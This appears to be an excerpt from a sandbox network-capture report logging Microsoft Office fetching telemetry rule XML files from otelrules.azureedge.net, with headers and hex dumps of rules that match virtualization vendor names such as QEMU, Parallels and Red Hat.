                                                          2024-12-02 16:56:33 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          75192.168.2.44983213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:33 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:33 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:33 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 411
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                          ETag: "0x8DC582B989AF051"
                                                          x-ms-request-id: 4d2a6959-e01e-0085-41b2-42c311000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165633Z-174f7845968zgtf6hC1EWRqd8s0000000xq000000000b65n
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:33 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          76192.168.2.44983313.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:34 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:35 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:34 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 470
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                          ETag: "0x8DC582BBB181F65"
                                                          x-ms-request-id: 6dbf519d-601e-0084-1b91-3f6b3f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165634Z-174f7845968kvnqxhC1EWRmf3g0000000reg00000000px8b
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:35 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          77192.168.2.44983513.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:34 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:35 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:34 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 502
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                          ETag: "0x8DC582BB6A0D312"
                                                          x-ms-request-id: 63854d8c-901e-007b-2581-3fac50000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165634Z-174f7845968xr5c2hC1EWRd0hn0000000png0000000048be
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:35 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          78192.168.2.44983413.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:34 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:35 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:34 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 427
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                          ETag: "0x8DC582BB556A907"
                                                          x-ms-request-id: 5810e7a8-301e-0000-3f91-3feecc000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165634Z-174f7845968cpnpfhC1EWR3afc00000014ag00000000ects
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:35 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          79192.168.2.44983613.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:35 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:35 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:35 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 407
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                          ETag: "0x8DC582B9D30478D"
                                                          x-ms-request-id: b6cdcd34-001e-0014-02c7-435151000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165635Z-174f784596886s2bhC1EWR743w00000014q000000000nr8c
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:35 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          80192.168.2.44983713.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:35 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:35 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:35 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 474
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                          ETag: "0x8DC582BB3F48DAE"
                                                          x-ms-request-id: 1fbe2e95-401e-0083-4bb4-43075c000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165635Z-174f7845968jrjrxhC1EWRmmrs00000014u000000000hy67
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:35 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          81192.168.2.44984013.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:36 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:37 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:37 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 416
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                          ETag: "0x8DC582BB5284CCE"
                                                          x-ms-request-id: f7ef784b-001e-0066-274f-44561e000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165637Z-174f7845968jrjrxhC1EWRmmrs00000014u000000000hy8s
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:37 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          82192.168.2.44983913.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:36 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:37 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:37 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 469
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                          ETag: "0x8DC582BB3CAEBB8"
                                                          x-ms-request-id: ccb4b789-101e-0028-02af-428f64000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165637Z-174f7845968frfdmhC1EWRxxbw00000014ng00000000vmzd
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:37 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          83192.168.2.44983813.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:36 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:37 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:37 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 408
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                          ETag: "0x8DC582BB9B6040B"
                                                          x-ms-request-id: 8abd9dd7-e01e-0099-194f-41da8a000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165637Z-174f78459684bddphC1EWRbht400000014dg00000000h1gk
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:37 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          84192.168.2.44984113.107.246.634437380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:37 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:37 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:37 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 472
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                          ETag: "0x8DC582B91EAD002"
                                                          x-ms-request-id: 1e6e7a31-701e-0098-6aa5-43395f000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165637Z-174f7845968swgbqhC1EWRmnb400000014t000000000s9xc
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
                                                          2024-12-02 16:56:37 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                          Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          85192.168.2.44984213.107.246.63443
                                                          TimestampBytes transferredDirectionData
                                                          2024-12-02 16:56:37 UTC192OUTGET /rules/rule120671v0s19.xml HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Accept-Encoding: gzip
                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                          Host: otelrules.azureedge.net
                                                          2024-12-02 16:56:38 UTC470INHTTP/1.1 200 OK
                                                          Date: Mon, 02 Dec 2024 16:56:37 GMT
                                                          Content-Type: text/xml
                                                          Content-Length: 432
                                                          Connection: close
                                                          Cache-Control: public, max-age=604800, immutable
                                                          Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                          ETag: "0x8DC582BAABA2A10"
                                                          x-ms-request-id: 657660fb-a01e-00ab-52ac-439106000000
                                                          x-ms-version: 2018-03-28
                                                          x-azure-ref: 20241202T165637Z-174f7845968xr5c2hC1EWRd0hn0000000pfg00000000qdpw
                                                          x-fd-int-roxy-purgeid: 0
                                                          X-Cache: TCP_HIT
                                                          Accept-Ranges: bytes
